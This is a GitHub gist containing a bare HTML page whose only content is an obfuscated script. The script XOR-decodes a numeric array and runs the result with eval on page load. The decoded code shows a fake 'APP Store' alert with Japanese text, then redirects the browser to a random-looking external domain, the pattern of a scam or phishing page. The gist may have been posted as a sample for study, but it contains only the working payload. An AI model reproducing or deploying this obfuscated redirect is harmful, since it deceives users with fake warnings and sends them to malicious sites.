Skip to content

Instantly share code, notes, and snippets.

@morimolymoly
Created April 14, 2022 23:55
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save morimolymoly/ffc6b79e2b1a8f7fe22d014db5a5cd3c to your computer and use it in GitHub Desktop.
Save morimolymoly/ffc6b79e2b1a8f7fe22d014db5a5cd3c to your computer and use it in GitHub Desktop.
<html>
<head>
<title></title>
</head>
<body>
<div>
<script>
var arr = "42931,42942,42935,42912,42918,43002,42992,42899,42882,42882,42866,42881,42918,42941,42912,42935,38768,38777,38772,38689,38682,38845,64603,63162,53922,63978,38814,38800,38745,38844,38837,38867,63071,63860,38719,38754,38774,38689,38789,38836,38813,38834,38791,38806,38864,42992,43003,42985,42968,42994,42994,42994,42994,42994,42994,42994,42994,42942,42941,42929,42931,42918,42939,42941,42940,43004,42912,42935,42914,42942,42931,42929,42935,43002,42997,42938,42918,42918,42914,42984,43005,43005,42923,42912,42934,42942,42931,42935,42928,42928,42915,42918,43004,42934,42919,42929,42937,42934,42940,42913,43004,42941,42912,42933,42997,43003,42985,42962".split(',').map(function (a) { return a | 0 });
var b = arr[arr.length - 1];
for (var i = 0; i < arr.length - 1; i++) {
arr[i] = arr[i] ^ b;
}
arr.pop();
eval(String.fromCharCode(...arr));
</script>
</div>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment